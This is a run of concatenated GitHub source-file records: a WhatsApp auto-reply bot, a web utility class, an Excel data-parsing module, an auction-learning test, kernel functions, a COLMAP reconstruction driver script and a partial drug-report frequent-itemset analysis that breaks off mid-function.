paste_message_routine(message)\n\n\ndef process_response(message):\n\n if '?' in str(message).lower():\n return 'beep! boop! soy un bot y vengo a responderte'\n\n else:\n return 'beep! boop! soy un bot y segun mis calculos hay un 99.9999% de probabilidades de que esta noche te rompan el ojt porque sos un tolazo SAPEEEEE'\n\n\ndef message_checker():\n global x, y\n\n while True:\n if get_position('wpp_project\\img\\green_point1.png'):\n\n open_chat_routine()\n\n processed_message = process_response(get_message())\n post_response(processed_message)\n\n print('Sleepen for 5 seconds')\n sleep(5)\n\n\nx = 0\ny = 0\nmessage_checker()","repo_name":"hackedTsukikami/autoresponse-whatsapp-bot","sub_path":"wpp_project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22604555036","text":"from pathlib import Path\n\nimport web_db\nfrom const import SERVER_HOST\n\n\nclass WebUtils:\n def get_state_list(self):\n data = web_db.Db()\n result = []\n status_html = \"\"\n status_html_template = \"\"\"{state_name}  \"\"\"\n\n html = \"\"\n rows = data.getStateListLabels()\n for row in rows:\n status_html = status_html_template\n status_html = status_html.replace(\"{host}\", SERVER_HOST)\n status_html = status_html.replace(\"{state_id}\", str(row['id']))\n status_html = status_html.replace(\"{state_name}\", row['state_name'])\n html += status_html\n return html\n\n def get_html_menu(self):\n html = Path('http_template/menu_template.html').read_text(encoding=\"utf-8\")\n html = html.replace(\"{host}\", SERVER_HOST)\n html = html.replace(\"{state_list}\", self.get_state_list())\n return html\n\n def check_cookie_token(self, cookies):\n data = web_db.Db()\n if \"token\" in cookies:\n return data.checkToken(cookies['token'])\n\n else:\n return False\n","repo_name":"Logsod/noti_rest_server","sub_path":"webAnswers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6965188312","text":"import os\nfrom packages.dirs import Dirs\nfrom packages.config import Config\nfrom openpyxl import load_workbook\nfrom app.classes.Logging import Logging\n\nclass Input():\n files = None\n current_file = ''\n current_rayon = ''\n\n def __init__(self):\n all_files = self.showFiles()\n self.files = self.filterFiles(all_files)\n self.input_dir = Dirs().get('input')\n self.rayons = Config('rayons').get()\n self.from_row = Config().get('input_from_row')\n\n # Получаем список файлов в папке input\n def showFiles(self):\n input_dir = Dirs().get('input')\n return [f for f in os.listdir(input_dir) if os.path.isfile(os.path.join(input_dir, f))]\n\n # Удаляем лишние файлы из списка файлов input\n def filterFiles(self, files):\n filter_files = []\n for file in files:\n if (file.endswith('.xlsx')):\n filter_files.append(file)\n return filter_files\n\n # Получаем ID района по заголовку\n def getRayonFromTitle(self, title):\n rows = None\n for rayon in self.rayons:\n if rayon['search_not'] == \"\":\n if (rayon['search'] in title.lower()):\n rows = dict({\n \"id\":rayon['id'],\n \"row_fed\":rayon['row_fed'],\n \"row_vet\":rayon['row_vet'],\n \"row_reab\":rayon['row_reab'],\n \"row_mnogodet\":rayon['row_mnogodet'],\n \"row_35\":rayon['row_35'],\n \"row_spec\":rayon['row_spec']\n })\n else:\n if (rayon['search'] in title.lower()) and (rayon['search_not'] not in title.lower()):\n rows = dict({\n \"id\":rayon['id'],\n \"row_fed\":rayon['row_fed'],\n \"row_vet\":rayon['row_vet'],\n \"row_reab\": rayon['row_reab'],\n \"row_mnogodet\":rayon['row_mnogodet'],\n \"row_35\":rayon['row_35'],\n \"row_spec\":rayon['row_spec']\n })\n\n if rows == None:\n error_text = 'Ошибка!!! Не удалось определить район по следующему заголовку: \"{}\"'.format(title)\n Logging().error(error_text)\n exit(error_text)\n return rows\n\n # Получаем информацию о типе выплаты содержащую С и ПО какую строку брать\n def getVplRange(self, ws):\n vpl = []\n\n max_row = ws.max_row\n merged_all = ws.merged_cells\n\n size_block = []\n temp_vpl = dict()\n\n for row in range(self.from_row, max_row):\n\n # Находим с какой строки начинается новый блок\n cell_a = \"{}{}\".format('A', row)\n if cell_a in merged_all:\n temp_vpl['from'] = row\n\n # Находим на какой строке заканчивается блок\n cell_c = \"{}{}\".format('C', row)\n try:\n if 'Итого по выплате' in ws[cell_c].value:\n temp_vpl['to'] = row\n except:\n pass\n\n # Сохраняем весь блок\n if len(temp_vpl) > 1:\n size_block.append(temp_vpl)\n temp_vpl = dict()\n\n return size_block\n\n # Получаем информацию об одной выплате\n def getOneVpl(self, ws, range_one):\n dataBlock = dict()\n\n cell_title = \"{}{}\".format('A', range_one['from'])\n title = ws[cell_title].value\n\n dataBlock['title'] = title\n\n cell_total_col = \"{}{}\".format('F', range_one['to'])\n dataBlock['total_col'] = ws[cell_total_col].value\n\n cell_total_sum_row = \"{}{}\".format('G', range_one['to'])\n cell_total_sum = ws[cell_total_sum_row].value\n\n if not (cell_total_sum == None):\n cell_total_sum = float(cell_total_sum.replace(',', '.'))\n cell_total_sum = float(\"{0:.2f}\".format(cell_total_sum))\n\n dataBlock['total_sum'] = cell_total_sum\n\n dataBlock['sb_col'] = 0\n dataBlock['sb_sum'] = 0\n for row in range(range_one['from'], range_one['to'] + 1):\n cell_vid_row = \"{}{}\".format('L', row)\n cell_vid = ws[cell_vid_row].value\n if cell_vid == 'сб/б':\n cell_sb_raw = \"{}{}\".format('G', row)\n cell_sb_str = ws[cell_sb_raw].value.strip()\n cell_sb = cell_sb_str.replace(',', '.')\n\n cell_col_raw = \"{}{}\".format('F', row)\n cell_col = ws[cell_col_raw].value.strip()\n\n try:\n dataBlock['sb_col'] = dataBlock['sb_col'] + int(cell_col)\n dataBlock['sb_sum'] = dataBlock['sb_sum'] + float(cell_sb)\n except:\n pass\n\n dataBlock['sb_sum'] = float(\"{0:.2f}\".format(dataBlock['sb_sum']))\n\n return dataBlock\n\n # Добавляем ID к одной выплате\n def getVplId(self, vpl):\n title = vpl['title'].strip()\n vpls = Config('vpl').get()\n\n vpl_meta = None\n for vpl in vpls:\n for like in vpl['like']:\n if like.lower() in title.lower():\n vpl_meta = dict({\n \"id\": vpl['id'],\n \"type\": vpl['type'],\n \"page_title\": vpl['page_title'],\n })\n\n if vpl_meta == None:\n error_text = 'Ошибка!!! Не удалось определить ID выплаты по заголовку: \"{}\"'.format(title)\n Logging().error(error_text)\n\n return vpl_meta\n\n\n # Добавляем ID к одной выплате\n def getTemplate(self, vpl_id):\n templates = Config('template').get()\n\n vpl_template = None\n for template in templates:\n if template['vpl_id'] == vpl_id:\n vpl_template = dict({\n \"sb_col\": template['sb_col'],\n \"sb_sum\": template['sb_sum'],\n \"total_col\": template['total_col'],\n \"total_sum\": template['total_sum'],\n })\n if vpl_template == None:\n pass\n # error_text = 'Ошибка!!! Не удалось определить ID выплаты по заголовку: \"{}\"'.format(vpl_id)\n # Logging().error(error_text)\n\n return vpl_template\n\n def filterVplOnMounth(self, vpl):\n title = vpl['title'].strip()\n\n app_config = Config().get()\n user_config = Config('user_config').get()\n user_mounth = user_config['mounth']\n user_year = user_config['year']\n\n search_string = ''\n if not ((user_mounth == 0) or (user_mounth == \"\")):\n for mounth in app_config['mounth']:\n if mounth['id'] == user_mounth:\n search_string = str(mounth['title'])\n\n if not (user_year == 0) or (user_year == \"\"):\n if not (search_string == ''):\n search_string = search_string + ' ' + str(user_year)\n else:\n search_string = str(user_year)\n\n if not (search_string == None):\n if search_string.lower() in title.lower():\n return True\n return False\n\n def filterVpl(self, vpl):\n title = vpl['title'].strip()\n del_vpl_list = Config('delete_vpls').get()\n for d_vpl in del_vpl_list:\n if d_vpl.lower() in title.lower():\n return False\n return True\n\n # Получаем информацию о всех выплатах\n def getVpls(self, ws):\n vpl = []\n ranges = self.getVplRange(ws)\n for range_one in ranges:\n one_vpl = self.getOneVpl(ws, range_one)\n f_vpl = self.filterVpl(one_vpl)\n f_vpl_on_mounth = self.filterVplOnMounth(one_vpl)\n\n\n if (f_vpl == True) and (f_vpl_on_mounth == True):\n vpl_meta = self.getVplId(one_vpl)\n if not (vpl_meta == None):\n one_vpl['meta'] = vpl_meta\n one_vpl['template'] = self.getTemplate(vpl_meta['id'])\n\n vpl.append(one_vpl)\n else:\n error_text = 'Внимание!!! Следующая выплата была отфильтрована: \"{}\". Учреждение: \"{}\". Файл: \"{}\"'.format(one_vpl, self.current_rayon, self.current_file)\n Logging().warning(error_text)\n return vpl\n\n\n # Получаем содержимое одного файла\n def getOne(self, file):\n data = dict()\n\n file_path = os.path.join(self.input_dir, file)\n wb = load_workbook(filename=file_path)\n ws = wb.worksheets[0]\n\n # Получаем название Района\n title_cell_raw = \"{}{}\".format('A', 2)\n title = ws[title_cell_raw].value.strip()\n data['file_name'] = file\n data['title'] = title\n\n self.current_file = file\n self.current_rayon = title\n\n # Получаем номера строк по названию\n data['meta'] = self.getRayonFromTitle(title)\n\n # Добавляем все выплаты\n data['vpls'] = self.getVpls(ws)\n\n wb.close()\n return data\n\n # Получаем список всех файлов\n def getAll(self):\n data = []\n for file in self.files:\n file_content = self.getOne(file)\n data.append(file_content)\n return data","repo_name":"mcrack25/python_JKUMerger","sub_path":"app/models/InputNew.py","file_name":"InputNew.py","file_ext":"py","file_size_in_byte":9876,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30747728574","text":"\"\"\"Test auction learning in symmetric and asymmetric implementations,\nusing a 2p-FPSB setup.\n\nThis script tests\n\n* whether the loop runs without runtime exceptions for a small number of iterations\n* whether the model learnt the appropriate bid for the top-range of valuations\n (this value is expected to be learned _very_ fast as it's most significant\n and as such should always be found (up to a certain range) even in a short amount of time)\n* Further, the script tests whether the utility after 200 iterations is in the expected range,\n if it isn't it won't fail but issue a warning (because this might just be due to\n stochasticity as it would take a significantly longer test time / more iterations to make sure.)\n\"\"\"\nimport warnings\nimport torch\nimport torch.nn as nn\n\nfrom bnelearn.bidder import Bidder\nfrom bnelearn.environment import AuctionEnvironment\nfrom bnelearn.mechanism import FirstPriceSealedBidAuction\nfrom bnelearn.learner import ESPGLearner\nfrom bnelearn.strategy import NeuralNetStrategy\nfrom bnelearn.sampler import UniformSymmetricIPVSampler\n\ncuda = torch.cuda.is_available()\ndevice = 'cuda' if cuda else 'cpu'\nspecific_gpu = None\nif cuda and specific_gpu:\n torch.cuda.set_device(specific_gpu)\n\nn_players = 2\nn_items = 1\nu_lo = 0\nu_hi = 10\n\nbatch_size = 2**14\ninput_length = 1\nhidden_nodes = [5,5]\nhidden_activations = [nn.SELU(), nn.SELU()]\nepoch = 100\n\nlearner_hyperparams = {\n 'sigma': 0.1,\n 'population_size': 64,\n 'scale_sigma_by_model_size': False\n}\n\noptimizer_type = torch.optim.SGD\noptimizer_hyperparams = {\n 'lr': 1e-2,\n 'momentum': 0.7\n}\n\nmechanism = FirstPriceSealedBidAuction(cuda = True)\nsampler = UniformSymmetricIPVSampler(u_lo, u_hi, n_players, n_items, batch_size, device)\n\ndef strat_to_bidder(strategy, batch_size, player_position=None): #pylint: disable=redefined-outer-name,missing-docstring\n return Bidder(strategy,\n batch_size = batch_size,\n player_position=player_position,\n enable_action_caching=False\n )\n\ndef test_learning_in_fpsb_environment():\n \"\"\"Tests the same setting as above (2p FPSB symmetric uniform), but with a\n fixed-environment implementation. (2 named agents with a shared model.)\n \"\"\"\n model = NeuralNetStrategy(input_length,\n hidden_nodes= hidden_nodes,\n hidden_activations= hidden_activations,\n ensure_positive_output=torch.tensor([float(u_hi)])\n ).to(device)\n\n bidder1 = strat_to_bidder(model, batch_size,0)\n bidder2 = strat_to_bidder(model, batch_size,1)\n\n env = AuctionEnvironment(mechanism,\n agents = [bidder1, bidder2],\n valuation_observation_sampler = sampler,\n batch_size = batch_size,\n n_players =n_players,\n strategy_to_player_closure = strat_to_bidder)\n learner = ESPGLearner(\n model = model,\n environment = env,\n hyperparams = learner_hyperparams,\n optimizer_type = optimizer_type,\n optimizer_hyperparams = optimizer_hyperparams,\n strat_to_player_kwargs={'player_position':bidder1.player_position})\n\n for _ in range(epoch+1):\n learner.update_strategy()\n\n utility = env.get_reward(env.agents[0])\n\n ## no fail until here means the loop ran properly (i.e. no runtime errors)\n\n ## for upper bound of valuation range, value should be close to optimal.\n bid_at_10 = model(torch.tensor([10.], dtype=torch.float, device = device))\n assert 4 < bid_at_10 < 7, \\\n \"Model failed to learn optimal bid at upper bound. Found {}, expected range [4,7]\".format(bid_at_10)\n\n # after 200 iterations, utility should be reliably above 0.5\n ## warn if not\n if not 1 < utility < 3:\n warnings.warn('Utility {:.2f} is not in expected range [1,3]!'.format(utility))\n","repo_name":"heidekrueger/bnelearn","sub_path":"bnelearn/tests/test_auction_learning.py","file_name":"test_auction_learning.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"39"} +{"seq_id":"37888777269","text":"from scipy.spatial.distance import pdist, squareform\nimport scipy\nfrom numpy import dot\nfrom numpy.linalg import norm\nimport numpy as np\n\n\n\ndef rbf(X, sigma=0.5):\n\tpairwise_dists = squareform(pdist(X, 'euclidean'))\n\tA = scipy.exp(-pairwise_dists ** 2 / (2. * sigma ** 2))\n\treturn A\n\ndef cosine_similarity(X):\n\td=[]\n\tcos_sim = lambda a,b: dot(a, b)/(norm(a)*norm(b))\n\tfor i in range(X.shape[0]):\n\t\ttd=[]\n\t\tfor j in range(X.shape[0]):\n\t\t\ttd.append(cos_sim(X[i], X[j]))\n\t\td.append(td)\n\tA= np.array(d)\n\treturn A\n","repo_name":"satwik77/pyDPP","sub_path":"pydpp/kernels.py","file_name":"kernels.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"39"} +{"seq_id":"39557855176","text":"import subprocess\nimport shutil\nimport os\nimport time\nimport glob\nimport argparse\nimport pycolmap\nfrom utils.lib import *\n# Function to parse command-line arguments\ndef parse_args():\n parser = argparse.ArgumentParser(description='COLMAP Reconstruction Script')\n parser.add_argument('--input_videos', type=str, default='input_videos.txt',\n help='A file with list of vidoes to be processed in all stages')\n parser.add_argument('--sparse_reconstuctions_root', type=str, default='colmap_models/sparse',\n help='Path to the sparsely reconstructed models.')\n parser.add_argument('--dense_reconstuctions_root', type=str, default='colmap_models/dense',\n help='Path to the densely registered models.')\n parser.add_argument('--epic_kithens_root', type=str, default='.',\n help='Path to epic kitchens images.')\n parser.add_argument('--logs_path', type=str, default='logs/dense/out_logs_terminal',\n help='Path to store the log files.')\n parser.add_argument('--summary_path', type=str, default='logs/dense/out_summary',\n help='Path to store the summary files.')\n parser.add_argument('--gpu_index', type=int, default=0,\n help='Index of the GPU to use.')\n\n return parser.parse_args()\n\n\nargs = parse_args()\n\ngpu_index = args.gpu_index\n\nvideos_list = read_lines_from_file(args.input_videos)\nvideos_list = sorted(videos_list)\nprint('GPU: %d' % (gpu_index))\nos.makedirs(args.logs_path, exist_ok=True)\nos.makedirs(args.summary_path, exist_ok=True)\nos.makedirs(args.sparse_reconstuctions_root, exist_ok=True)\nos.makedirs(args.dense_reconstuctions_root, exist_ok=True)\n\n\ni = 0\nfor video in videos_list:\n pre = video.split('_')[0]\n if (not os.path.exists(os.path.join(args.dense_reconstuctions_root, '%s' % video))):\n # check the number of images in this video\n num_lines = len(glob.glob(os.path.join(args.epic_kithens_root,pre,video,'*.jpg')))\n\n print('Processing: ', video, '(',num_lines, 'images )')\n start_time = time.time()\n\n # Define the path to the shell script\n script_path = 'scripts/register_dense.sh'\n\n # Create a unique copy of the script\n script_copy_path = video + '_' + str(os.getpid()) + '_' + os.path.basename(script_path)\n shutil.copy(script_path, script_copy_path)\n\n # Output file\n output_file_path = os.path.join(args.logs_path, script_copy_path.replace('.sh', '.out'))\n\n\n # Define the command to execute the script\n command = [\"bash\", script_copy_path, video,args.sparse_reconstuctions_root,args.dense_reconstuctions_root,args.epic_kithens_root,args.summary_path,str(gpu_index)]\n # Open the output file in write mode\n with open(output_file_path, 'w') as output_file:\n # Run the command and capture its output in real time\n process = subprocess.Popen(command, stdout=output_file, stderr=subprocess.PIPE, text=True)\n while True:\n output = process.stderr.readline()\n if output == '' and process.poll() is not None:\n break\n if output:\n output_file.write(output)\n output_file.flush()\n\n # Once the script has finished running, you can delete the copy of the script\n os.remove(script_copy_path)\n\n\n reg_images = get_num_images(os.path.join(args.dense_reconstuctions_root,video))\n if reg_images > 0:\n print(f\"Registered_images/total_images: {reg_images}/{num_lines} = {round(reg_images/num_lines*100)}%\")\n else:\n print('The video reconstruction fails!! no colmap files are found!')\n\n\n\n\n print(\"Execution time: %s minutes\" % round((time.time() - start_time)/60, 0))\n print('-----------------------------------------------------------')\n\n i += 1\n\n","repo_name":"epic-kitchens/epic-fields-code","sub_path":"register_dense.py","file_name":"register_dense.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"39"} +{"seq_id":"2704195967","text":"from sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.gaussian_process import GaussianProcessRegressor\r\nimport sklearn.svm as skS\r\nimport sklearn.neighbors as skN\r\nimport pandas as pd\r\nimport numpy\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow import keras\r\nimport xlrd\r\nimport xlwt\r\nimport math\r\nimport sklearn\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport orangecontrib.associate.fpgrowth as oaf\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nw_list = []\r\nwith tf.Session() as sess:\r\n for year in [year for year in range(2010, 2018)]:\r\n X = tf.nn.sigmoid((year - 2010) / 3)\r\n num = sess.run(X)\r\n w = 2.0 * (1.0 - num)\r\n # print(w)\r\n w_list.append(w)\r\n # print(X)\r\n\r\nbook = xlrd.open_workbook(\"MCM_NFLIS_Data.xlsx\")\r\nfor sheet in book.sheets():\r\n print(sheet.name)\r\n\r\nsheet_new = book.sheet_by_name(\"Data\")\r\nprint(\"nrows:\", sheet_new.nrows)\r\n\r\n# State name\r\nSN = []\r\nSN_dcit = {}\r\nfor i in range(1, sheet_new.nrows):\r\n process_data = sheet_new.row_values(i)\r\n SN.append(process_data[1])\r\nSN = set(SN)\r\nfor key in SN:\r\n num = 0.0\r\n for i in range(sheet_new.nrows):\r\n process_data = sheet_new.row_values(i)\r\n # SN.append(process_data[1])\r\n if process_data[1] == key:\r\n num = process_data[3]\r\n break\r\n\r\n SN_dcit.update({key: num})\r\n# print(SN_dcit)\r\n\r\n# County name\r\nCN_all = {}\r\nfor N in SN:\r\n CN = []\r\n CN_dict = {}\r\n for i in range(sheet_new.nrows):\r\n process_data = sheet_new.row_values(i)\r\n if process_data[1] == N:\r\n CN.append(process_data[2])\r\n CN = set(CN)\r\n for key in CN:\r\n num = 0.0\r\n for i in range(sheet_new.nrows):\r\n process_data = sheet_new.row_values(i)\r\n # SN.append(process_data[1])\r\n if process_data[2] == key and process_data[1] == N:\r\n num = process_data[5]\r\n # print(num)\r\n break\r\n\r\n CN_dict.update({key: num})\r\n\r\n # print(CN_dict)\r\n CN_all.update({N: CN_dict})\r\n\r\n\r\ndef get_data(med_name, state_name):\r\n file_name = \"data/\" + med_name + \".txt\"\r\n with open(file_name, \"r\") as f:\r\n temp = f.read()\r\n _dict = eval(temp)\r\n\r\n CN = CN_all[state_name]\r\n # print(CN)\r\n # print(CN.values())\r\n CN_list = [key for key in CN]\r\n\r\n ouput_data = {}\r\n # {year: {numbering: {'DR': num, 'name': str}}}\r\n for key in _dict:\r\n ouput_data.update({key: []})\r\n for index in range(len(CN_list)):\r\n numbering = CN[CN_list[index]]\r\n # print(numbering)\r\n if numbering not in _dict[key]:\r\n ouput_data[key].append(0)\r\n else:\r\n num = _dict[key][numbering][\"DR\"]\r\n ouput_data[key].append(num)\r\n\r\n out = []\r\n for key in ouput_data:\r\n # print(key)\r\n out.append(ouput_data[key])\r\n\r\n # print(ouput_data)\r\n # print(out)\r\n # return ouput_data\r\n return out, CN_list\r\n\r\n\r\n# data_test, CN_list = get_data(\"Heroin\", \"VA\")\r\n\r\n# Threshold = 5\r\n# n = 21\r\n\r\n# # print(len(data_test))\r\n# data_test_temp = data_test.copy()\r\n# length = len(data_test)\r\n# data_test_temp = np.array(data_test_temp)\r\n# CN_list_temp = CN_list.copy()\r\n\r\n# l = np.array([])\r\n# for j in range(len(CN_list)):\r\n# sum = 0\r\n# for i in range(length):\r\n# sum = sum + data_test[i][j]\r\n# l = np.append(l, sum)\r\n\r\n# # Sort\r\n# l.sort()\r\n# # print(l)\r\n\r\n# cnt = 0\r\n# for j in range(len(CN_list)):\r\n# sum = 0\r\n# for i in range(length):\r\n# sum = sum + data_test[i][j]\r\n# # print(sum)\r\n# if sum <= l[len(l) - n - 1]:\r\n# data_test_temp = np.delete(data_test_temp, j-cnt, axis=1)\r\n# CN_list_temp.remove(CN_list[j])\r\n# cnt = cnt + 1\r\n\r\n# data_test = data_test_temp.tolist()\r\n# CN_list = CN_list_temp.copy()\r\n# print(\"Shape: (%d, %d)\" % (len(data_test), len(data_test[0])))\r\n\r\n# for in1 in range(len(data_test)):\r\n# cnt = 1\r\n# for in2 in range(len(data_test[0])):\r\n# if data_test[in1][in2] > Threshold:\r\n# data_test[in1][in2] = cnt\r\n# else:\r\n# data_test[in1][in2] = 0\r\n# cnt = cnt + 1\r\n\r\n# # print(data_test)\r\n\r\n\r\ndef tool_trans(l):\r\n out = []\r\n for i in range(len(l)):\r\n if l[i] != 0:\r\n out.append(l[i])\r\n\r\n return out\r\n\r\n\r\n# # print(tool_trans([1, 0, 3]))\r\n# for in3 in range(len(data_test)):\r\n# data_test[in3] = tool_trans(data_test[in3])\r\n\r\n# print(data_test)\r\n# print(data_test)\r\n# dict_get_test = dict(oaf.frequent_itemsets(data_test, 2))\r\n# print(dict_get_test)\r\n# for key in dict_get_test:\r\n# print(key,\":\", dict_get_test[key])\r\n\r\n\r\ndef sepP(dataset):\r\n\r\n def tool_temp(index, formL, behindL):\r\n outL = []\r\n for i in range(len(formL)):\r\n if i != index:\r\n outL.append(behindL[i])\r\n else:\r\n outL.append(formL[index])\r\n\r\n return outL\r\n\r\n output_data = []\r\n for in1 in range(1, len(dataset)):\r\n for in2 in range(len(dataset[0])):\r\n temp_l = tool_temp(in2, dataset[in1-1], dataset[in1])\r\n output_data.append(temp_l)\r\n\r\n return output_data\r\n\r\n\r\ndef get_data_pro(med_name, state_name, Threshold=66, n=20):\r\n file_name = \"data/\" + med_name + \".txt\"\r\n with open(file_name, \"r\") as f:\r\n temp = f.read()\r\n _dict = eval(temp)\r\n\r\n CN = CN_all[state_name]\r\n # print(CN)\r\n # print(CN.values())\r\n CN_list = [key for key in CN]\r\n\r\n ouput_data = {}\r\n # {year: {numbering: {'DR': num, 'name': str}}}\r\n for key in _dict:\r\n ouput_data.update({key: []})\r\n for index in range(len(CN_list)):\r\n numbering = CN[CN_list[index]]\r\n # print(numbering)\r\n if numbering not in _dict[key]:\r\n ouput_data[key].append(0)\r\n else:\r\n num = _dict[key][numbering][\"DR\"]\r\n ouput_data[key].append(num)\r\n\r\n data_test = []\r\n for key in ouput_data:\r\n # print(key)\r\n data_test.append(ouput_data[key])\r\n\r\n # print(ouput_data)\r\n # print(out)\r\n # return ouput_data\r\n # return out, CN_list\r\n\r\n # data_test, CN_list = get_data(\"Heroin\", \"VA\")\r\n\r\n # Threshold = 5\r\n # n = 21\r\n\r\n # print(len(data_test))\r\n data_test_temp = data_test.copy()\r\n length = len(data_test)\r\n data_test_temp = np.array(data_test_temp)\r\n CN_list_temp = CN_list.copy()\r\n\r\n l = np.array([])\r\n for j in range(len(CN_list)):\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + data_test[i][j]\r\n l = np.append(l, sum)\r\n\r\n # Sort\r\n l.sort()\r\n # print(l)\r\n\r\n cnt = 0\r\n for j in range(len(CN_list)):\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + data_test[i][j]\r\n # print(sum)\r\n if sum <= l[len(l) - n - 1]:\r\n data_test_temp = np.delete(data_test_temp, j-cnt, axis=1)\r\n CN_list_temp.remove(CN_list[j])\r\n cnt = cnt + 1\r\n\r\n data_test = data_test_temp.tolist()\r\n CN_list = CN_list_temp.copy()\r\n\r\n data_test = sepP(data_test)\r\n\r\n print(\"Shape: (%d, %d)\" % (len(data_test), len(data_test[0])))\r\n print(\"CN_list shape: %d.\" % len(CN_list))\r\n\r\n for in1 in range(len(data_test)):\r\n cnt = 1\r\n for in2 in range(len(data_test[0])):\r\n if data_test[in1][in2] > Threshold:\r\n data_test[in1][in2] = cnt\r\n else:\r\n data_test[in1][in2] = 0\r\n cnt = cnt + 1\r\n\r\n # print(data_test)\r\n\r\n def tool_trans(l):\r\n out = []\r\n for i in range(len(l)):\r\n if l[i] != 0:\r\n out.append(l[i])\r\n\r\n return out\r\n\r\n # print(tool_trans([1, 0, 3]))\r\n for in3 in range(len(data_test)):\r\n data_test[in3] = tool_trans(data_test[in3])\r\n\r\n return data_test, CN_list\r\n\r\n\r\n# data_test, CN_list = get_data_pro(\"Heroin\", \"VA\")\r\n# # print(data_test)\r\n# dict_get_test = dict(oaf.frequent_itemsets(data_test, min_support=120))\r\n# # print(dict_get_test)\r\n# print(len(dict_get_test))\r\n\r\n\r\n# def fuck(string):\r\n# list_out = []\r\n# tempStr = \"\"\r\n# ifB = False\r\n# for i in range(len(string)):\r\n# temp = string[i]\r\n# # print(temp)\r\n# # print(temp.isalnum())\r\n# if temp.isalnum():\r\n# # print(\"#\")\r\n# tempStr = tempStr + temp\r\n# ifB = True\r\n# if (temp.isalnum() == False) and ifB:\r\n# # break\r\n# list_out.append(int(tempStr))\r\n# tempStr = ''\r\n# ifB = False\r\n\r\n# # print(list_out)\r\n# return list_out\r\n\r\n\r\n# # fuck(\"[3, 4, 6, 11, 14, 15, 17, 19, 20]\")\r\n\r\n\r\n# def match(string):\r\n# string_ = \"\"\r\n# for i in range(len(string)):\r\n# # print(string[i])\r\n# if string[i] == \"{\":\r\n# for j in range(i, len(string)):\r\n# if string[j] != \"}\":\r\n# if string[j] == '{':\r\n# string_ = string_ + '['\r\n# else:\r\n# string_ = string_ + string[j]\r\n# else:\r\n# string_ = string_ + \"]\"\r\n# break\r\n# break\r\n\r\n# # def fuck(string):\r\n# # list_out = []\r\n# # tempStr = \"\"\r\n# # ifB = False\r\n# # for i in range(len(string)):\r\n# # temp = string[i]\r\n# # if temp.isalnum and (!ifB):\r\n# # tempStr = tempStr + temp\r\n# # ifB = True\r\n# # if (!temp.isalnum) and ifB:\r\n# # # break\r\n# # list_out.append( int(tempStr))\r\n# # tempStr = ''\r\n# # ifB = False\r\n\r\n# # return list_out\r\n\r\n# # print(string_)\r\n# # list_ = list(string_)\r\n# list_ = fuck(string_)\r\n# return list_\r\n\r\n\r\n# # print(type(match(\"frozenset({3, 4, 6, 11, 14, 15, 17, 19, 20})\")))\r\n# # print(match(\"frozenset({3, 4, 6, 11, 14, 15, 17, 19, 20})\"))\r\n\r\n# # # {index: list}\r\n# # # {index: lenght}\r\n# # ILi = {}\r\n# # ILe = {}\r\n\r\n# # Get max\r\n# M = 0\r\n# for Max in range(1, 20):\r\n# ifE = False\r\n# for key in dict_get_test:\r\n# # a = 0\r\n# value = dict_get_test[key]\r\n\r\n# # print(type(key))\r\n# str_key = str(key)\r\n# # print(str_key)\r\n# # print(key)\r\n# list_key = match(str_key)\r\n# # print(list_key)\r\n# if len(list_key) == Max:\r\n# # print(value)\r\n# # print(list_key)\r\n# # a = 0\r\n# # print(\"!\")\r\n# ifE = True\r\n# break\r\n\r\n# if ifE:\r\n# pass\r\n# else:\r\n# # print(list_key)\r\n# M = Max - 1\r\n# break\r\n\r\n# print(M)\r\n\r\n# for key in dict_get_test:\r\n# # a = 0\r\n# value = dict_get_test[key]\r\n\r\n# # print(type(key))\r\n# str_key = str(key)\r\n# # print(str_key)\r\n# # print(key)\r\n# list_key = match(str_key)\r\n# # print(list_key)\r\n# if len(list_key) == M:\r\n# # if value != 140:\r\n# # print(value)\r\n# print(value)\r\n# print(list_key)\r\n# # a = 0\r\n# # ifE = True\r\n# # break\r\n\r\n# if len(list_key) == 1:\r\n# print(value)\r\n# print(list_key)\r\n\r\ndef END(med_name, state_name, year_start=2010.0, Threshold=66, n=20, min_support=120, bias=1.1):\r\n file_name = \"data/\" + med_name + \".txt\"\r\n with open(file_name, \"r\") as f:\r\n temp = f.read()\r\n _dict = eval(temp)\r\n\r\n CN = CN_all[state_name]\r\n # print(CN)\r\n # print(CN.values())\r\n CN_list = [key for key in CN]\r\n\r\n ouput_data = {}\r\n # {year: {numbering: {'DR': num, 'name': str}}}\r\n year_start = int(year_start)\r\n for key in _dict:\r\n if key >= year_start:\r\n # print(\"!!!!!!!!!!!!!!!\")\r\n # print(key)\r\n # print(type(key))\r\n ouput_data.update({key: []})\r\n for index in range(len(CN_list)):\r\n numbering = CN[CN_list[index]]\r\n # print(numbering)\r\n if numbering not in _dict[key]:\r\n ouput_data[key].append(0)\r\n else:\r\n num = _dict[key][numbering][\"DR\"]\r\n ouput_data[key].append(num)\r\n\r\n data_test = []\r\n for key in ouput_data:\r\n # print(key)\r\n data_test.append(ouput_data[key])\r\n\r\n # print(ouput_data)\r\n # print(out)\r\n # return ouput_data\r\n # return out, CN_list\r\n\r\n # data_test, CN_list = get_data(\"Heroin\", \"VA\")\r\n\r\n # Threshold = 5\r\n # n = 21\r\n\r\n # print(len(data_test))\r\n data_test_temp = data_test.copy()\r\n length = len(data_test)\r\n data_test_temp = np.array(data_test_temp)\r\n CN_list_temp = CN_list.copy()\r\n\r\n l = np.array([])\r\n for j in range(len(CN_list)):\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + 